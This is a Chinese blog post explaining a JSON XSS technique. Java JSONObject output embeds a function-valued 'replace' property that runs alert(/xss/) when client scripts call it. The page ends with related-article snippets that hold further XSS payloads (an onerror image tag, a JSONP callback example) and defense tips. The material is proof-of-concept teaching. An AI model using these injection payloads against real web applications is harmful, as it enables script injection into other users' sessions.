Json XSS (只是一个小窥)

最新推荐文章于 2024-05-18 10:01:59 发布
最新推荐文章于 2024-05-18 10:01:59 发布
阅读量8.5k 收藏 1
点赞数
分类专栏: 信安学习 Web渗透学习 文章标签: json xss 被动触发XSS之JSONObject XSS cross site scripting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_f0rm4t3d/article/details/23851071
版权
大家都清楚json 类似于字典的样子吧,这里就不再赘述了,XSS直接上代码: 

json = new JSONObject();
json.put("code", 200);
json.put("info", "{'replace':function(){alert(/xss/);}}");
json.put("msg", "success");
System.out.println(json);
// 输出:{"code":200,"info":{"replace":function(){ alert(/xss/); }},"msg":"success"}

JSONObject 在输出json串的时候,info会作为对象输出,并且其中嵌入replace方法,js再调用replace
方法转义过滤时,也就调用的嵌入的replace方法。(这里是根据程序员的常规习惯,让他自动到用户触发,但是如果客户端代码没有调用对应的函数就不会被触发,所以这里要首先纵观原有
js代码的,构造可以被触发的函数也是要注意的)

具体的触发过程如下: 
<script tpye='text/javascript'>
json= JSONObject.json_list('info')['replace'] // 这段是客户端代码会调用到的,所以就会抛出这个函数了

function()
{
	alert(/xss/);
}
</script>

根据不同的场合这个info可以构造成不同对象,也可以构造数组{function(){alert(/xss/)}},或者是简单的
函数function(){alert(/xss/)},

值得注意的是这种方法在jQuery中行不通,jQuery会对json串的格式做检查,如果是一般的ajax和jsonp都可能会存在这种xss问题。最后说句,搞XSS,很多的小X都是需要极其猥琐的思路一点点挖掘了。
1_f0rm4t3d
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
json xss_基于JSONXSS
weixin_26722031的博客
07-30 2319
json xssBasically Cross-Site scripting is injecting the malicious code into the websites on the client-side. This vulnerability normally allows an attacker to masquerade as a victim user, to carry out...
Spring过滤json中的XSS
学医救不了中国人
10-24 6440
spring处理json是通过MappingJackson2HttpMessageConverter实现的。 而MappingJackson2HttpMessageConverter中的read()和writeInternal()分别对应json的请求和响应。 也就是说我们的过滤工作就这两个方法中展开。 writeInternal首先创建一个类并继承MappingJackson2HttpMessa...
推荐开源项目:JsonpCallbackValidator - 防范XSS攻击的安全验证库
最新发布
gitblog_00085的博客
05-18 400
推荐开源项目:JsonpCallbackValidator - 防范XSS攻击的安全验证库 项目地址:https://gitcode.com/willdurand/JsonpCallbackValidator 1、项目介绍 在Web开发中,JSONP(JSON with Padding)常用于跨域数据传输。然而,如果不加以控制,JSONP也可能成为XSS(跨站脚本攻击)的入口点。为了解决这个问题,...
JSON XSS
mingyqf的博客
05-09 895
JSON XSS 本文由Bypass整理发布, 文章目录[JSON XSS](https://www.cnblogs.com/xiaozi/p/9929704.html) 漏洞实例一: 1、在更新用户信息,修改联系电话,抓包绕过前端20个字符限制,Payload为 111<img src=1 onerror=alert(1)> 2、更新后,访问json 3、已隐去相关信息,json形式大约是这样子: {"birthday":"1991-12-09 00:00:00","org": {
JSON XSS
11-08 112
漏洞实例一: 1、在更新用户信息,修改联系电话,抓包绕过前端20个字符限制,Payload为111<img src=1 onerror=alert(1)> 2、更新后,访问json 3、已隐去相关信息,json形式大约是这样子: {"birthday":"1991-12-09 00:00:00","org": {"parent":"ae5ef...
【快学SpringBoot】过滤XSS脚本攻击(包括json格式)
weixin_33845881的博客
06-17 1806
XSS攻击是什么 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 简而言之,就是作恶用户通过表单提交一些前端代码,如果不做处理的话,这些前端代码将会在展示的时候被浏览器执行。 如何避免XSS攻击 ...
XSS
Dev-Liangjian的博客
09-15 197
跨站脚本攻击 (XSS) 当你允许用户输入的 HTML 和 javascript 在你自己的网站上直接显示的时候,就有可能遭受这种攻击。 如果服务器端对于用户的输入不做任何无害处理的话,这些内容就会注入到网页的内容中去,然后浏览器就会解释执行这些 HTML 和 javascript 代码。 跨站脚本攻击的解决方案 阻止此类攻击的一个办法就是总是对用户输入的内容做无害处理。消除有问题的...
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
njaXt:不只是另一个XSS工具
05-12
跨站点脚本攻击(XSS)是一种基于Web的攻击,其中恶意脚本被注入到受信任的网站中并在用户不知情的情况下运行客户端。 最终用户的浏览器不知道正在发生攻击,因为它运行了受感染网站发送的所有代码,这使攻击非常...
simpleXSSBackdoor:只是一个非常简单的xss后门
05-31
1. **反射型XSS**:这种类型的XSS攻击发生在用户点击一个带有恶意脚本的链接时,恶意代码作为参数传递到服务器,然后未经处理地返回到浏览器执行。 2. **存储型XSS**:在存储型XSS中,恶意脚本被永久地存储在服务器...
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
防范json xss的方法 - 黑白网络
05-01
防范json xss的方法 - 黑白网络 防范json xss的方法 - 黑白网络
Json序列化和反序列化
05-06
Json序列化和反序列化代码,写的不好,请多指教,用C#语言
Web安全之XSS攻击与防御小结
02-23
(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS随响应内容一起返回给浏览器,最后浏览器解析执行XSS代码,这个过程就像一次发射,所以叫反射型XSS。(2)存储型:...
jsonp安全攻防技术(JSON劫持、XSS漏洞)
tiancityycf的专栏
06-07 3117
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): {"id":"1","name":"名字"} 那么他们可以首先通过 JSONP 的“ Padding...
Java防止Xss注入json_Xss,基础与实战一步到位。
weixin_39630744的博客
10-28 354
在深入了解之前Xss之前,我们先来了解一下浏览器常用的安全策略吧。什么是源和同源策略源就是主机,协议,端口名的一个三元组。同源策略(Same Origin Policy, SOP)是Web应用程序的一种策略机制,该机制规定了应用程序代码可以访问的资源范围。同源策略的基本思想是,源自于某台服务器上的代码只能访问同一台服务器上的Web资源。重要的事情说三遍:它只是个机制,而不是标准(哪怕标准...
使用antixss,安全的json也被过滤了,可以改写格式,将前段传过来的json转换成json字符串即可
weixin_50592059的博客
03-26 184
被过滤改成字符串后不过滤。
json格式xss漏洞的方法
04-29
JSON 格式的 XSS 漏洞,是指攻击者利用前端服务返回的 JSON 格式数据,在页面中成功注入恶意代码实现攻击的一种方式。 攻击方法主要有两种: 1. 直接注入 攻击者在 JSON 格式的数据中,掺杂恶意代码,例如: ``` { "name": "张三", "age": "<script>alert('XSS攻击')</script>" } ``` 当服务端返回这段 JSON 数据,渲染到前端页面使用时,恶意代码会被成功执行。 2. 利用 JSONP JSONP 是一种跨域请求的解决方案,其利用 script 标签可以跨域加载 JavaScript 的特性,但同时也引发了一些安全问题。 攻击者可以通过 JSONP 发送一个请求,将自己的恶意代码作为回调函数的参数传递过来。例如: ``` <script src="http://www.targetwebsite.com/getData?callback=evilFunc"></script> <script> function evilFunc(data) { // 执行恶意代码 } </script> ``` 当服务端返回的数据是这样的形式,就会导致恶意代码被执行。 为了防止这种攻击,我们可以采取以下措施: 1. 对从服务端返回的 JSON 数据进行过滤和校验。 2. 禁止使用 eval 函数,将 JSON 数据转换成 JavaScript 对象时,使用 JSON.parse 函数。 3. 采用 CSP 策略,限制页面中能够执行的脚本类型。 4. 避免使用 JSONP 跨域请求。如果使用了 JSONP,应该对返回的数据进行过滤。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值